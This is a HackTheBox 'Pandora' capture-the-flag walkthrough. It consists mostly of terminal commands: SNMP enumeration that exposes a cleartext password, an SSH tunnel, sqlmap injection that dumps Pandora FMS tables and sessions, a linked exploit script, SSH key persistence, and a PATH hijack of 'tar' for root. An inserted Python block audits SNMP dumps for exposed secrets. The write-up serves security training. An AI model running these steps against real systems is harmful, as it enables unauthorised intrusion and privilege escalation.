HackTheBox – Pandora Walkthrough – In English
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -sV -sC 10.10.11.136
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -sU --top-ports=20 panda.htb
┌──(root㉿kali)-[/home/kali/Downloads]
└─# snmpwalk -v 1 -c public panda.htb > snmpwalk-1.txt
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat snmpwalk-1.txt
We get
Username: daniel
Password: HotelBabylon23
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh daniel@10.10.11.136
As you can see, while I was going through the information I found a cleartext username and password, so I used those to log into the machine via SSH.
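A defensive check for the exposure described above, as an added example that is not part of the original walkthrough: it scans a saved snmpwalk dump for process arguments that look like secrets. It assumes the credentials were visible as process command-line arguments (hrSWRunParameters), which the walkthrough does not state; the sample lines and the flag list are constructed.

```python
import re

# hrSWRunParameters (HOST-RESOURCES-MIB): arguments of every running process.
HR_SW_RUN_PARAMETERS = "1.3.6.1.2.1.25.4.2.1.5"
LINE = re.compile(r'^(?P<name>\S+) = STRING: "(?P<val>.*)"$')
# Assumed list of secret-bearing flags; extend it for your own tooling.
SECRET = re.compile(
    r"(?<![\w-])(?P<flag>-p|--password|--pass|--token|--secret)"
    r"(?:=|\s+)(?P<value>[^\s'\"]+)"
)

# Constructed sample in snmpwalk's output format (not taken from the target).
SAMPLE = '''\
iso.3.6.1.2.1.1.5.0 = STRING: "host01"
iso.3.6.1.2.1.25.4.2.1.2.1118 = STRING: "sh"
iso.3.6.1.2.1.25.4.2.1.5.1118 = STRING: "-c /usr/local/bin/check_host -u svc_monitor -p Example-Passw0rd"
iso.3.6.1.2.1.25.4.2.1.5.1201 = STRING: "-D -p 2222"
HOST-RESOURCES-MIB::hrSWRunParameters.1310 = STRING: "--token=CONSTRUCTED-TOKEN-123 --verbose"
'''

def normalise(name):
    """Map the three spellings snmpwalk prints to a dotted numeric OID."""
    name = name.replace("HOST-RESOURCES-MIB::hrSWRunParameters", HR_SW_RUN_PARAMETERS)
    if name.startswith("iso."):
        name = "1." + name[4:]
    return name.lstrip(".")

def mask(value):
    """Keep two characters so the report itself does not leak the secret."""
    return value[:2] + "*" * (len(value) - 2)

def audit(dump):
    """Return (process index, flag, masked value) for each exposed secret."""
    findings = []
    for line in dump.splitlines():
        m = LINE.match(line)
        oid = normalise(m["name"]) if m else ""
        if not oid.startswith(HR_SW_RUN_PARAMETERS + "."):
            continue  # only process arguments are inspected
        for s in SECRET.finditer(m["val"]):
            if s["flag"] == "-p" and s["value"].isdigit():
                continue  # "-p 2222" is a port, not a password
            findings.append((oid.rsplit(".", 1)[1], s["flag"], mask(s["value"])))
    return findings

if __name__ == "__main__":
    for index, flag, value in audit(SAMPLE):
        print(f"process {index}: {flag} {value}")
```

Any finding on a walk of your own agent means that whoever knows the community string can read that secret, so keep secrets off command lines and restrict what the agent's view exposes.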
The user flag is in another user's directory, so I need to pivot into that user. The two primary targets I had were /var/www/html and /var/www/pandora. The html side was visible to the public, but the pandora one was new. Inside the /etc/hosts file we see a weird assignment, so I decided to use this as a lead.
If we assume that this hostname will trigger the pandora directory, then we will need to set up a dynamic tunnel. You can do this with the following command: ssh -D 9090 daniel@panda.htb
Using this tunnel, we can set up a proxy to view the webpage.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh -D 9090 daniel@panda.htb
http://localhost.localdomain/pandora_console/
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat /etc/proxychains4.conf
┌──(root㉿kali)-[/home/kali/Downloads]
└─# proxychains sqlmap --url="http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=''" -D pandora --tables
┌──(root㉿kali)-[/home/kali/Downloads]
└─# proxychains sqlmap --url="http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=''" -T tpassword_history --dump
┌──(root㉿kali)-[/home/kali/Downloads]
└─# proxychains sqlmap --url="http://localhost.localdomain/pandora_console/include/chart_generator.php?session_id=''" -T tsessions_php --dump
http://localhost.localdomain/pandora_console/index.php?session_id=g4e01qdgk36mfdh90hvcc54umq
https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/blob/master/sqlpwn.py
We now log in as admin.
http://localhost.localdomain/pandora_console/images/
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/home/matt$ cd .ssh
matt@pandora:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys
matt@pandora:/home/matt/.ssh$ chmod 700 authorized_keys
matt@pandora:/home/matt/.ssh$ cat id_rsa
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh matt@10.10.11.136 -i id_rsa
matt@pandora:~$ cd /home/matt/
matt@pandora:~$ echo "/bin/bash" > tar
matt@pandora:~$ chmod +x tar
matt@pandora:~$ export PATH=/home/matt:$PATH
matt@pandora:~$ /usr/bin/pandora_backup
root@pandora:~# cat /root/root.txt